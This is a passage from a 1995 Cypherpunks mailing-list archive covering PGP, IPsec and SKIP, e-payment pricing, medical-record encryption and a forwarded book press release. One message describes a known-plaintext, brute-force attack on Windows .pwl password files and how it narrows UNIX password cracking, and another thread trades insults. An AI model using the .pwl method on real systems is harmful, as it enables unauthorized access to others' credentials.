From jamesd at echeque.com  Wed Nov 29 09:39:56 1995
From: jamesd at echeque.com (James A. Donald)
Date: Thu, 30 Nov 1995 01:39:56 +0800
Subject: The future will be easy to use
Message-ID: <199511291715.JAA04720@blob.best.net>


At 09:20 AM 11/30/95 -0500, amp wrote:
>unfortunately, it appears to me that if you _really_ want encryption
>to be universal, it's gotta be done on windoze, it's gotta be
>point-n-click and seamless to the mail application. 

Which, at present, means it's gotta be done on Pegasus.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd at echeque.com






From Andrew_Barrett at checkfree.com  Wed Nov 29 09:52:28 1995
From: Andrew_Barrett at checkfree.com (Andrew Barrett/CheckFree Corporation)
Date: Thu, 30 Nov 1995 01:52:28 +0800
Subject: (cpx) Re:(fwd) Like FV with Crypto ... 'Cept Different ...
Message-ID: <9511292039.AA0442@6thstreetcheckfree.com>


Lucky writes (quoting propaganda forwarded to Punks by Robert):

>>  WebTrader can be used as a stand-alone Internet application or in
>>conjunction with SBT's Pro Series 3.0i accounting software.  WebTrader has a
>>suggested retail price of $1,295.
                           ^^^^^^^^^^^^^^^^

>They can't be serious. Why would you want to pay $1,300 for a payment
>system, when you can get an Ecash merchant account for a fraction of what
>Checkfree is charging?

Not all merchants wishing to transact on the Web are as knowledgeable or 
sophisticated as the Punks on the different options. The offering includes a 
Web presence and payment processing, hassle free. No energy expenditure 
required. No need to develop an instant competency in electronic commerce. If a 
prospective web merchant has neither in place, I imagine the cost might be 
attractive. I also imagine that, like any other business in the world, SBT 
charges what they think the market will bear.

Please note that CheckFree did not price the offering - they do the CC 
processing for SBT at some agreed upon cost to SBT. SBT sets the price for the 
offering in order to recover that cost, as well as their own, and establish 
some sort of margin.

And by the way, I had nothing to do with project, so I beg you not to direct 
flames thisaway, should any decide flames are called for. Hey man, I just work 
here....  :)

AJ.






From perry at piermont.com  Wed Nov 29 09:56:52 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Thu, 30 Nov 1995 01:56:52 +0800
Subject: NRL IPsec/IPv6 code
Message-ID: <199511291742.MAA03253@jekyll.piermont.com>



An early version of NRL's 4.4BSDlite based IPsec/IPv6 implementation
is up on ftp.c2.org in an appropriately export controlled directory.

This isn't an official distribution -- I'm just putting up the code I
got because there has been some interest in it. I've been hacking it
in to NetBSD of late.

Perry





From johnl at radix.net  Wed Nov 29 10:15:27 1995
From: johnl at radix.net (John A. Limpert)
Date: Thu, 30 Nov 1995 02:15:27 +0800
Subject: Who has the right to read your e-mail? Old hash, but I need to  ask.
Message-ID: <199511281601.LAA02857@saltmine.radix.net>


At 06:58 AM 11/28/95 -0600, (Bill) wrote:
>Who has the right to read your personal e-mail.
>E-mail created at work?
>E-mail downdloaded at work?
>E-mail stored on a PC at work? 

The December 1995 issue of Communications of the ACM (CACM) has several
articles on e-mail privacy.

Managing User Perceptions of Email Privacy
Suzanne P. Weisband and Bruce A. Reinig

The Ethical and Legal Quandary of Email Privacy
Janice C. Sipior and Burke T. Ward


--
John A. Limpert
johnl at Radix.Net






From hallam at w3.org  Wed Nov 29 10:56:06 1995
From: hallam at w3.org (hallam at w3.org)
Date: Thu, 30 Nov 1995 02:56:06 +0800
Subject: Judge won't drop Netcom from suit
In-Reply-To: <30BA3798.2781E494@pts.mot.com>
Message-ID: <9511291823.AA26757@zorch.w3.org>



The article looks like it was written from the scoentologists press release.
The judgement was posted in alt.religion.scientology. The actual judgement was 
far from a success for the scientologists. 

		Phill





From EALLENSMITH at ocelot.Rutgers.EDU  Wed Nov 29 11:05:49 1995
From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH)
Date: Thu, 30 Nov 1995 03:05:49 +0800
Subject: Medical Records
Message-ID: <01HY7U2Z5PSG8WYVEV@mbcl.rutgers.edu>


	Here's something that may make attempts such as Clipper a bit harder to
mandate, if this (non-escrowed, I believe) system becomes common. It should
also provide some pressure for relaxation of ITAR.
	-Allen

      (c) 1995 Copyright Nando.net
      (c) 1995 Reuter Information Service
      
[...]

   A security system developed at the University of California at San
   Francisco prevents unauthorized access to x-rays and other medical
   images transmitted via computer networks. A scientist described the
   system in a report prepared for a radiologists' convention here.

[...]
   
   Stephen Wong, assistant professor of radiology and bioengineering, and
   colleagues developed the system for the picture archiving and
   communications system used at the university to store and transmit
   digitized medical images.
   
   He said the authenticity of the images as well as patient
   confidentiality must be protected.
   
   "We have to make sure that the digital information and images are not
   altered accidentally or surreptitiously," Wong said. "In addition,
   x-rays and other imaging studies are part of the patient's medical
   record and must be protected from unauthorized access."
   
   The system uses mathematical formulas or codes to scramble the images
   through encryption. It involves a "two-key" system -- one code enables
   public access but a second, private code is required to unscramble the
   information.
   
   The private code, known only to the individual to whom the information
   is transmitted, is 1,024 computer bits long, Wong said.
   
   In emergencies where fast transmission is needed, the unscrambled
   image is transmitted with a digital "fingerprint," a smaller code that
   assures the intended viewer that no one has altered the original
   image.
   
   Wong prepared his report for the annual meeting of the Radiological
   Society of North America.





From EALLENSMITH at ocelot.Rutgers.EDU  Wed Nov 29 11:07:04 1995
From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH)
Date: Thu, 30 Nov 1995 03:07:04 +0800
Subject: Harbinger (sp?) system
Message-ID: <01HY7U5HY1WK8WYVEV@mbcl.rutgers.edu>


	Sorry if this question has been asked and I missed it, but does anyone
know how their system works?
	Thanks,
	-Allen


      (c) 1995 Copyright Nando.net
      (c) 1995 Cox News Service
      
   ATLANTA (Nov 29, 1995 - 09:44 EST) -- Harbinger Corp. has announced
   new software aimed at making the Internet safe for commerce, a move
   that could dramatically reshape the small company.

[...]

   TrustedLink, the product announced Tuesday but not available until
   next year, will let firms connect via the Net as well as through
   Harbinger networks, he said.





From jamesd at echeque.com  Wed Nov 29 11:13:43 1995
From: jamesd at echeque.com (James A. Donald)
Date: Thu, 30 Nov 1995 03:13:43 +0800
Subject: Elliptic curves, patent status?
Message-ID: <199511290717.XAA29808@blob.best.net>


At 05:16 PM 11/28/95 -0400, Michael Smith wrote:
>
> I'm unclear about the patent status of elliptic curve 
> systems. Are they covered by the Diffie-Hellman patent? 
> That is, is the lnguage of this patent broad enough to 
> cover _all_ public-key systems, regardless of their 
> mathematical basis? 

No, but RSA will litigate you with the objective of
inflicting extravagant legal costs regardless.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd at echeque.com






From blane at eskimo.com  Wed Nov 29 11:14:20 1995
From: blane at eskimo.com (Brian Lane)
Date: Thu, 30 Nov 1995 03:14:20 +0800
Subject: Inexpensive Crypto Boxes...
Message-ID: <199511290726.XAA17712@mail.eskimo.com>


> It isn't likely to be worth doing this with a sony play-station; it's DSP
> capabilities are nothing special, and you're paying way too much for
> irrelevant stuff like CD-ROMs, 3D accellerators, etc. For the same money

  I seem to remember a product from Sony last year that had a CDROM 
drive in it, a small LCD display, and a minimal keyboard. I think it 
was meant for reading encyclopedias or something.

  What would be cool would be a small device like this with a Magneto 
Optical drive in it. Generate yourself a large one-time pad and off 
you go...

  Or, you could have a secure messaging system (running a stripped 
down version of PGP) that could connect to a host via POP3 protocol 
(thru a internal modem of course)  handle your mail, etc.

    Brian
---------------------------------------------------------------------------
blane at eskimo.com                | Electronics, Privacy, Raytracing.
ftp://ftp.eskimo.com/~blane     | Embedded Microprocessor Programmer
http://www.eskimo.com/~blane    |





From jimbell at pacifier.com  Wed Nov 29 11:18:45 1995
From: jimbell at pacifier.com (jim bell)
Date: Thu, 30 Nov 1995 03:18:45 +0800
Subject: key for Alice as promised (not)
Message-ID: <m0tKrau-00090tC@pacifier.com>


>On Tue, 28 Nov 1995, Adam Hupp wrote:
>
>> >Can you imagine??  I'm simply not willing to fool myself into thinking 
>> >that I ahve security by posting a key and using PGP.
>> 
>> Unless you can post some proof that PGP is insecure, stop insisting it is.
>
>PGP is really not the issue.  The issue is more my security and the
>environment that I use PGP in.  I don't have a trusted machine to run PGP
>on.  Anyone who wants to can come up to machine and copy my secret keyring
>or they can even watch me typing my password in. 
>
>So, I don't fool myself, and I don't use PGP, except for things like
>exchanging a one-time pad with someone when I've already sent the message
>out across another delivery mechanism, like on a floppy delivered my
>courier. 
>
>Alice de 'nonymous ...

You're a bonehead.  On the one hand, you FAIL to stop or dramatically reduce
claimed spoofings of your notes by using PGP (which would almost certainly
work perfectly for this limited purpose) yet you claim that you'll only
trust PGP in a limited scenario of courier-delivered data!

Talk about "penny-wise and pound foolish"!  

Wake up, idiot!  The purpose of encryption and signing and such is to REDUCE
problems, ideally to zero but if not to some adequately small value.  To
fail to use signing when there is no ongoing problem is risky; to not use
signing when there is a  serious continuing problem is downright lunatic.
That sets up an irresolvable contradiction:  On the one hand, you're willing
to tolerate a continuing problem, yet on the other you claim that your
standards are so high that you won't use a system unless the probability of
security essentially precludes a loss of security.

Now can you see why we're laughing?







From Doug.Hughes at Eng.Auburn.EDU  Wed Nov 29 11:29:47 1995
From: Doug.Hughes at Eng.Auburn.EDU (Doug Hughes)
Date: Thu, 30 Nov 1995 03:29:47 +0800
Subject: SKIP Source Release is out!
In-Reply-To: <199511291534.KAA02780@jekyll.piermont.com>
Message-ID: <doug-9510291859.AA029810760@netman.eng.auburn.edu>



Perry sez:

>
>Tom Markson writes:
>> Check out http://skip.incog.com.  We've released the source to the SKIP
>> key management and IP layer encryption package for SunOs 4.x.
>
>SKIP is a non-standard being pushed by Sun.
>

Correct me if I'm wrong, but isn't sun trying to make it a standard
(in competetion with Photuris) ?

Can I also assume that the IPV6 stuff requires pretty extensive kernel
mods? (Not bad, but a very definite consideration)

--
____________________________________________________________________________
Doug Hughes					Engineering Network Services
System/Net Admin  				Auburn University
			doug at eng.auburn.edu
		Pro is to Con as progress is to congress





From adam at lighthouse.homeport.org  Wed Nov 29 11:31:34 1995
From: adam at lighthouse.homeport.org (Adam Shostack)
Date: Thu, 30 Nov 1995 03:31:34 +0800
Subject: Medical Records
In-Reply-To: <01HY7U2Z5PSG8WYVEV@mbcl.rutgers.edu>
Message-ID: <199511291909.OAA16016@homeport.org>


	It seems that they use signatures & hashes; nice work, a good
advance for medical records storage, but I'd ask how keys are managed,
and also what prevents me exploiting the 'hash-only' mode of sending
in what I'm cliaming to be is an emergency.  (Not that these
invalidate the system; they're just interesting areas to work on.)

E. ALLEN SMITH wrote:

|    "We have to make sure that the digital information and images are not
|    altered accidentally or surreptitiously," Wong said. "In addition,
|    x-rays and other imaging studies are part of the patient's medical
|    record and must be protected from unauthorized access."
|    
|    The system uses mathematical formulas or codes to scramble the images
|    through encryption. It involves a "two-key" system -- one code enables
|    public access but a second, private code is required to unscramble the
|    information.
|    
|    The private code, known only to the individual to whom the information
|    is transmitted, is 1,024 computer bits long, Wong said.
|    
|    In emergencies where fast transmission is needed, the unscrambled
|    image is transmitted with a digital "fingerprint," a smaller code that
|    assures the intended viewer that no one has altered the original
|    image.


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From frank at funcom.no  Wed Nov 29 11:47:42 1995
From: frank at funcom.no (Frank Andrew Stevenson)
Date: Thu, 30 Nov 1995 03:47:42 +0800
Subject: Microsoft weak encryption
In-Reply-To: <199511291447.GAA19250@mail.eskimo.com>
Message-ID: <Pine.SGI.3.91.951129200230.29189B-100000@odin>



I have been able to verify the key generation for the
.pwl file, and sucessfully decrypted one, the contets
is really suited for a known plaintext attack as the
first characters appears to be the USERNAME in capitals
padded with 0x00 to a total field size of 20,
I have written software to bruteforce this field, but without
optimizing I have a running time of 130 hours (Pentium 66)

An interesting observation: If the password is shared with a UNIX
fileserver (8 letters) once the 32 bit RC4 key is found guessing the
last 4 letters of the password will reveal the remaining letters.
This will then greatly reduce the keyspace needed to crack the UNIX
password (you need to guess the case of the password though - (2^8) )  

> Peter Gutmann has an interesting article in sci.crypt, demonstrating how
> weak Microsoft's encryption is with basic access control in Windows for
> Workgroups (I'm assuming Win95 uses the same algorithm).  Essentially, he
> shows how a 32-bit key is created to be passed to RC4 for encrypting .PWL
> files.  I think a t-shirt is definitely in order for this.
> 
> Anyone up for writing some bruting code?
> 
> Joel
> 

#include <std/disclaimer.h> 
E3D2BCADBEF8C82F A5891D2B6730EA1B PGPencrypted mail preferred, finger for key







From Chris.Claborne at SanDiegoCA.ATTGIS.com  Wed Nov 29 11:48:27 1995
From: Chris.Claborne at SanDiegoCA.ATTGIS.com (Chris Claborne)
Date: Thu, 30 Nov 1995 03:48:27 +0800
Subject: San Diego Cpunks Physical Meeting
Message-ID: <9511291918.AA11333@toad.com>


San Diego Area CPUNKS symposium  Thursday, December 7, 1995

   Invitation to all Cypherpunks to join the San Diego crowd at "The Mission
Cafe & Coffee Shop".  Get the latest update of Lance Cottrell's anonymous
e-mail server, "mixmaster", exchange keys, and discuss other topical
subjects.  If you are in to what's happening on the list, encryption,
privacy, The Mission is the pace to be.

   Don't forget to bring your public key  fingerprint and forms of
identification.  If you can figure out how to get it on the back of a
business card, that would be cool.  

   Drop me a note if you plan to attend.

Place: The Mission Cafe & Coffee Shop
       3795 Mission Bl in Mission Beach.
       488-9060


Time:1800

Their Directions:
	8 west to Mission Beach Ingram Exit
	Take west mission bay drive
	Go right on Mission Blvd.

	On the corner of San Jose and mission blvd.
	It is located between roller coaster and Garnett.
	It's kind of 40s looking building...  funky looking 
        (their description, not mine)

They serve stuff to eat, coffee stuff, and beer.

See you there!

New guy, bring your fingerprint.

     2
 -- C  --

                                        ...  __o
                                       ..   -\<,
Chris.Claborne at SanDiegoCA.ATTGIS.Com   ...(*)/(*).          CI$: 76340.2422
http://bordeaux.sandiegoca.attgis.com/
PGP Pub Key fingerprint =  A8 FA 55 92 23 20 72 69  52 AB 64 CC C7 D9 4F CA
Avail on Pub Key server.






From perry at piermont.com  Wed Nov 29 12:18:32 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Thu, 30 Nov 1995 04:18:32 +0800
Subject: SKIP Source Release is out!
In-Reply-To: <doug-9510291859.AA029810760@netman.eng.auburn.edu>
Message-ID: <199511291926.OAA03467@jekyll.piermont.com>



Doug Hughes writes:
> >Tom Markson writes:
> >> Check out http://skip.incog.com.  We've released the source to the SKIP
> >> key management and IP layer encryption package for SunOs 4.x.
> >
> >SKIP is a non-standard being pushed by Sun.
> 
> Correct me if I'm wrong, but isn't sun trying to make it a standard
> (in competetion with Photuris) ?

The IETF has many sorts of standards. It explicitly has a way to
standardize things that the IETF doesn't think are a good idea but
which should have the ability to interoperate if you do them.

My opinion is that it is fairly clear that Photuris is the key
management system people will be using, although it is going to have
to evolve to work with a real network wide certificate database
infrastructure. SKIP isn't going to be the standard.

> Can I also assume that the IPV6 stuff requires pretty extensive kernel
> mods? (Not bad, but a very definite consideration)

IPSEC, SKIP, IPv6, etc., all require kernel mods. You can't help
it. Its part of the IP stack, you know.

BTW, IPv6 uses IPSEC, but IPSEC isn't only for IPv6 -- its also usable
in IPv4. We were careful about how we architected that.

The NRL code implements IPsec for both v4 and for the v6 stack it
comes with. In fact, the NRL code is primarily an IPv6 implementation
-- they just implemented IPSEC as a side effect.

Perry





From master at internexus.net  Wed Nov 29 12:22:34 1995
From: master at internexus.net (Laszlo Vecsey)
Date: Thu, 30 Nov 1995 04:22:34 +0800
Subject: So easy... in the future.
In-Reply-To: <9511291354.AA16998@sulphur.osf.org>
Message-ID: <Pine.LNX.3.91.951129142107.741C-100000@micro.internexus.net>


-----BEGIN PGP SIGNED MESSAGE-----

I've found mkpgp to be a very useful tool, and an easy to use add on for 
'pine' and pgp. But for those that prefer a GUI E-Mail application,
I think it would be great if Netscape were to integrate some 
more security in that portion of their navigator. Or perhaps a third 
party could add this in by creating a PGP 'Plugin' for Netscape...

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by mkpgp1.6, a Pine/PGP interface.

iQCVAwUBMLy0YJDNAGOpPg0ZAQF1mQQAkgbwvBrrmqCYedYpW/+c1HfTIqQ6HUyp
buxNTga6x2yUTM/nprWo/y+RrhdckO3UgLgu8dW2p/fH9g9GAhxuimDaVijb3/LR
pL8mi6/q1LAu80IOh0jktiQXQL+V4ySq/f688snlmlOdQDpjKWo9tsmUtw5+DhDF
b5URyUM+4Ms=
=Iixz
-----END PGP SIGNATURE-----





From hallam at w3.org  Wed Nov 29 12:22:49 1995
From: hallam at w3.org (hallam at w3.org)
Date: Thu, 30 Nov 1995 04:22:49 +0800
Subject: Medical Records
In-Reply-To: <01HY7U2Z5PSG8WYVEV@mbcl.rutgers.edu>
Message-ID: <9511291929.AA01140@zorch.w3.org>



Exactly! We need to point out that crypto is essential to protect us from 
criminals. Some criminials may use crypto technology, just as they use faxes and 
portable phones. But just because a portable phone could be used by a drug 
dealer does not mean they should be illegal.

Jim Bizdos just pinned a rather cool poster to the wall of the 3rd florr coffee 
lounge here at MIT today. It has a woman on a phone labeled "escrow enabled" and 
then the spooks listening in from a post marked "escrow integrity center". The 
motto is "A good Marketing Agency Listens to its Customers - We Hear You!"

		Phill





From vznuri at netcom.com  Wed Nov 29 12:31:19 1995
From: vznuri at netcom.com (Vladimir Z. Nuri)
Date: Thu, 30 Nov 1995 04:31:19 +0800
Subject: Whitehouse PROFS email privacy case
Message-ID: <199511291931.LAA02934@netcom13.netcom.com>


this was a hot subject a long time ago on the list, here's a book
with the scoop


------- Forwarded Message
From: Phil Agre <pagre at weber.ucsd.edu>
To: rre at weber.ucsd.edu
Subject: PROFS Case: Book on White House e-mail

Date: Wed, 22 Nov 1995 12:50:49 -0500 (EST)
From: Eddie Becker <ebecker at cni.org>
Subject: PROFS Case: Book on White House e-mail

  NEW BOOK PROVIDES NARRATIVE ON PROFS CASE
  ALONG WITH REMARKABLE PRIMARY DOCUMENTS.
  Following Press Release    11/22/96
  REVELATIONS FROM --WHITE HOUSE E-MAIL: THE 
  TOP SECRET COMPUTER MESSAGES THE 
  REAGAN/BUSH WHITE HOUSE TRIED TO DESTROY, 
  Edited by Tom Blanton (New York: The New Press, 256 pp. 
  plus 1.44 megabyte computer disk), distributed by W.W. Norton 
  & Company.
  For more information, contact: Tom Blanton (o) 202/994-7000, 
  (h) 301/718-6543, nsarchiv at gwis2.circ.gwu.edu
  SECRET SUPPORT FOR SADDAM HUSSEIN
  Top Reagan administration officials, including Colin Powell, 
  presided over covert intelligence support to Saddam Hussein 
  during the Iran-Iraq War, including targeting information on 
  Iranian civilian infrastructure for Saddam's SCUD missiles.  In 
  secret e-mail messages, National Security Council staffer William 
  Cockell recommended -- and Deputy National Security Adviser 
  Alton Keel agreed -- they cover-up the assistance to Saddam, 
  because "it is difficult to characterize this as defensive assistance." 
  [pp. 36-41]  Subsequently, while Powell served as Deputy 
  National Security Adviser in 1987, the Reagan administration 
  discussed a "shopping list" of pro-Iraq actions in order to "stiffen 
  them up." [pp.235-237]
  HELPING NORIEGA "CLEAN UP HIS IMAGE"
  Three months after Seymour Hersh and The New York Times 
  exposed Manuel Noriega's involvement in drugrunning and 
  murder, Noriega approached the National Security Council staff 
  with an offer to assassinate the Nicaraguan Sandinista leadership.  
  Oliver North relayed the offer to his boss, National Security 
  Adviser John Poindexter, writing that "you will recall that over the 
  years Manuel Noriega in Panama and I have developed a fairly 
  good relationship."  Poindexter replies, "I have nothing against him 
  other than his illegal activities" and approves a North meeting with 
  Noriega -- as does Secretary of State George Shultz.  The 
  bottom line?  The White House agrees to help Noriega "clean up 
  his image" in return for Panamanian sabotage operations against 
  the Nicaraguan Sandinistas. [pp. 23-25]
  THE WHITE HOUSE SENDS A COCAINE CONSPIRATOR 
  TO CLUB FED
  Top Reagan administration officials from the White House, 
  Pentagon, and Justice Department just said yes to a reduced 
  prison sentence (in a minimum security facility) for a Honduran 
  colonel and sometime CIA asset who was convicted of cocaine 
  trafficking and conspiracy to assassinate the civilian president of 
  Honduras, because otherwise the colonel might "start singing 
  songs nobody wants to hear" about covert operations in 
  Honduras.  [pp. 42-48]
  SECRET DEALS WITH LOBBYISTS ON A 
  CONTROVERSIAL CONGRESSIONAL VOTE
  The White House struck a secret deal with the American Israel 
  Public Affairs Committee in the spring of 1986 to avoid an 
  AWACS-style all-out battle on a Saudi arms deal vote, and in 
  return got AIPAC's help on foreign aid funding and on the Iran-
  contra scandal.  But National Security Council staffer Howard 
  Teicher warned, "whatever one may think of the jewish 
  leadership, the 'masses' are rarely if ever swayed by what the 
  rational, reasonable leaders say.  instead, it is the israel right or 
  wrong demagogues at the grassroots level that will try to take 
  advantage of the leadership's pusillanimity."  [pp. 150-157]
  HIDDEN FAILURES OF THE POLYGRAPH 
  (PRECURSORS OF ALDRICH AMES)
  According to the National Security Council's top 
  counterintelligence official in 1985, career FBI agent David 
  Major, two out of the 48 individuals indicted, arrested and/or 
  convicted of espionage against the U.S. in the years 1975-85, 
  had successfully deceived the CIA's favorite screening tool, the 
  polygraph (lie detector) -- a 4% error rate.  (Aldrich Ames 
  subsequently beat the polygraph twice.)  [p.220]
  ROSS PEROT'S EGO RIDES AGAIN
  Ross Perot "sandbagged" the Reagan White House at a 1986 
  Congressional hearing on the POW-MIA issue, according to the 
  lead White House staffer on the issue, Col. Richard Childress, 
  who also wrote, "he has played into Hanoi's hands for his ego and 
  doesn't even know it."  [p. 162]
  MORE WHITE HOUSE E-MAIL STORIES
  * Then-Israeli Defense Minister Yitzhak Rabin personally 
  arranged with Oliver North for secret shipments of captured PLO 
  weapons to Central America in September 1986, with the 
  approval of the National Security Adviser.  Rabin also 
  commented, according to North's e-mail, "at some length about 
  his low opinion of our intel service [CIA] - both in terms of 
  coverts ops and intelligence collecting," and promised "no more 
  Pollards."  [pp. 119-122]
  * The regular breakfast meetings in the Reagan administration of 
  the National Security Adviser, the Secretary of State (George 
  Shultz), and the Secretary of Defense (Caspar Weinberger) often 
  degenerated into what staffers called "slugfests."  p. 193
  * Contrary to claims in a recent autobiography, National Security 
  Adviser Robert McFarlane did not anticipate the collapse of the 
  Soviet Union and craft U.S. policy accordingly to pressure the 
  Soviets, rather, in his 1984 e-mail, McFarlane wrote "it will not 
  change ideologically and therefore our task is to establish a basis 
  for peaceful competition with them."  p.189
  * At the behest of Israeli Prime Minister Shimon Peres, Vice 
  President George Bush proposed a "7-point peace plan" during a 
  Middle East trip in 1986, only to have it shot down by White 
  House and State Department opposition back in Washington.  p. 
  200
  * While serving as Deputy National Security Adviser to President 
  Reagan in 1987, Colin Powell lived in an alarmed house at Fort 
  McNair which "scared hell out of the family initially and then 
  became amusing when the MPs assaulted the house every time 
  the alarm misfired."  p. 211
  * White House staffers joked about CIA Director William 
  Casey's renowned "mumbles," writing, "The last time he told 
  Goldwater we were going to 'lay some mines in Nicaragua,' 
  Goldwater thought he said we were going to 'pay some fines for 
  some joggers.'"  p. 214
                                        END     


- ------- End of Forwarded Message


------- End of Forwarded Message






From Doug.Hughes at Eng.Auburn.EDU  Wed Nov 29 12:34:44 1995
From: Doug.Hughes at Eng.Auburn.EDU (Doug Hughes)
Date: Thu, 30 Nov 1995 04:34:44 +0800
Subject: SKIP Source Release is out!
In-Reply-To: <199511291926.OAA03467@jekyll.piermont.com>
Message-ID: <doug-9510291935.AA029910760@netman.eng.auburn.edu>


>
>Doug Hughes writes:
>> >Tom Markson writes:
>> >> Check out http://skip.incog.com.  We've released the source to the SKIP
>> >> key management and IP layer encryption package for SunOs 4.x.
>> >
>> >SKIP is a non-standard being pushed by Sun.
>> 
>> Correct me if I'm wrong, but isn't sun trying to make it a standard
>> (in competetion with Photuris) ?
>
>The IETF has many sorts of standards. It explicitly has a way to
>standardize things that the IETF doesn't think are a good idea but
>which should have the ability to interoperate if you do them.
>
>My opinion is that it is fairly clear that Photuris is the key
>management system people will be using, although it is going to have
>to evolve to work with a real network wide certificate database
>infrastructure. SKIP isn't going to be the standard.
>
>> Can I also assume that the IPV6 stuff requires pretty extensive kernel
>> mods? (Not bad, but a very definite consideration)
>
>IPSEC, SKIP, IPv6, etc., all require kernel mods. You can't help
>it. Its part of the IP stack, you know.
>
I knew it was a safe assumption. :)

>BTW, IPv6 uses IPSEC, but IPSEC isn't only for IPv6 -- its also usable
>in IPv4. We were careful about how we architected that.
>
>The NRL code implements IPsec for both v4 and for the v6 stack it
>comes with. In fact, the NRL code is primarily an IPv6 implementation
>-- they just implemented IPSEC as a side effect.
>

'Tis a shame, because SKIP is available right now and will, if past history
is any indication, become the defacto standard on Sun platforms because it
is readily available, and the IPV6 stuff isn't, nor probably will be soon
because even those with the source code are not permitted to give out mods
to this source (in the case of SunOS - I believe). However, a loadable
kernel module would be very nice with the IPv6 stuff in it. Unfortunately,
I have very little experience with loadable kernel modules of this scope,
nor the source code to use as a reference, should the loadable modules be
feasible.


--
____________________________________________________________________________
Doug Hughes					Engineering Network Services
System/Net Admin  				Auburn University
			doug at eng.auburn.edu
		Pro is to Con as progress is to congress





From black at sunflash.eng.usf.edu  Wed Nov 29 12:50:46 1995
From: black at sunflash.eng.usf.edu (James Black)
Date: Thu, 30 Nov 1995 04:50:46 +0800
Subject: key for Alice as promised (not)
In-Reply-To: <m0tKrau-00090tC@pacifier.com>
Message-ID: <Pine.SUN.3.91.951129144031.25904B-100000@sunflash.eng.usf.edu>


Hello,

On Wed, 29 Nov 1995, jim bell wrote:

> Wake up, idiot!  The purpose of encryption and signing and such is to REDUCE
> problems, ideally to zero but if not to some adequately small value.  To
> fail to use signing when there is no ongoing problem is risky; to not use
> signing when there is a  serious continuing problem is downright lunatic.
> That sets up an irresolvable contradiction:  On the one hand, you're willing
> to tolerate a continuing problem, yet on the other you claim that your
> standards are so high that you won't use a system unless the probability of
> security essentially precludes a loss of security.

  Unfortunately priorities are mixed up here.  Reputation should be more 
important, unless Alice is actually a group of teenagers that are just 
having fun at the lists expense, and could care less what they write as 
long as it gets a response.  If the writer actually cared about his 
reputation then a digital signature would be the best way to go, but a 
different encryption scheme should be used for the signature than the 
message.
  Just my $0.02, but if Alice continues to just not care about his 
reputation, and people can't verify that the same writer(s) wrote it, 
then maybe ignoring posts would be a good choice.
  Take care and have fun.

==========================================================================
James Black (Comp Sci/Comp Eng sophomore)
e-mail: black at eng.usf.edu
http://www.eng.usf.edu/~black/index.html
**************************************************************************






From jlasser at rwd.goucher.edu  Wed Nov 29 12:52:25 1995
From: jlasser at rwd.goucher.edu (Jon Lasser)
Date: Thu, 30 Nov 1995 04:52:25 +0800
Subject: key for Alice as promised (not)
In-Reply-To: <199511290315.UAA26439@usr4.primenet.com>
Message-ID: <Pine.SUN.3.91.951129143454.8834A-100000@rwd.goucher.edu>


On Tue, 28 Nov 1995, Adam Hupp wrote:

> >Can you imagine??  I'm simply not willing to fool myself into thinking 
> >that I ahve security by posting a key and using PGP.
> 
> Unless you can post some proof that PGP is insecure, stop insisting it is.

Hold on a minute.  Alice is, here, 100% correct.

If I use PGP to read messages and there's a videocamera trained on the 
keyboard, and other people have access to the machine, PGP is not 
secure.  Similarly, if PGP is on a computer which other people may use 
without my supervision, they can  monitor keystrokes, etc. and PGP is not 
secure.

A chain is only as strong as its weakest link; Alice recognizes this, and 
makes no claim that PGP itself is the weak link.  The weak link is the 
physical security of the system which Alice claims to use.

Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser at rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.






From jlasser at rwd.goucher.edu  Wed Nov 29 12:58:50 1995
From: jlasser at rwd.goucher.edu (Jon Lasser)
Date: Thu, 30 Nov 1995 04:58:50 +0800
Subject: The future will be easy to use
In-Reply-To: <199511290707.XAA24211@blob.best.net>
Message-ID: <Pine.SUN.3.91.951129144206.8834B-100000@rwd.goucher.edu>


On Mon, 27 Nov 1995, James A. Donald wrote:

> At 03:30 PM 11/28/95 EST, Carl Ellison wrote:
> > Of course.  This isn't the base case.  We would have some keys which I sign
> > based on my own personal knowledge; things handed to me by people I know;
> > some possibly published in the paper where the real key owner would see the
> > claim and be able to contest it.
> 
> You are making the same erroneous assumption that Phil made when he
> designed the Web of trust:  You assume that it is important and 
> interesting to link key ID's to physical bodies.  This is usually
> not the case:  Linking key ID's to home web pages etc is not only 
> easier -- it is also usually more interesting and important.

Not if you're encrypting a Credit Card transaction to ship physical 
goods.  In that case, I'm going to certainly want to link a key ID to a 
physical body (or at least address) if I'm the seller, so as to limit 
liability as best I can.

While this might not ultimately be important, early adopters of crypto on 
the net seem in general to be financially interested with an eye to limiting 
liability. They want linked keys.

There's a public-relations aspect to crypto which most systems not 
linking name -> key id fail.  This is the step necessary to get it out 
the door.

Unfortunately, it also appears counter to CP philosophy.

However, if you have optional linking of ID and name, shippers will only 
ship to keys with such attributes. Because just ID and address, it could 
be a "hit and run" type attack shipped to a safe maildrop.

Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser at rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.






From perry at piermont.com  Wed Nov 29 13:00:07 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Thu, 30 Nov 1995 05:00:07 +0800
Subject: SKIP Source Release is out!
In-Reply-To: <doug-9510291935.AA029910760@netman.eng.auburn.edu>
Message-ID: <199511291947.OAA03516@jekyll.piermont.com>



Doug Hughes writes:
> 'Tis a shame, because SKIP is available right now and will, if past history
> is any indication, become the defacto standard on Sun platforms because it
> is readily available,

I suspect that no one else will use it. Morningstar is already
shipping the ESP/AH stuff -- other router vendors are doubtless going
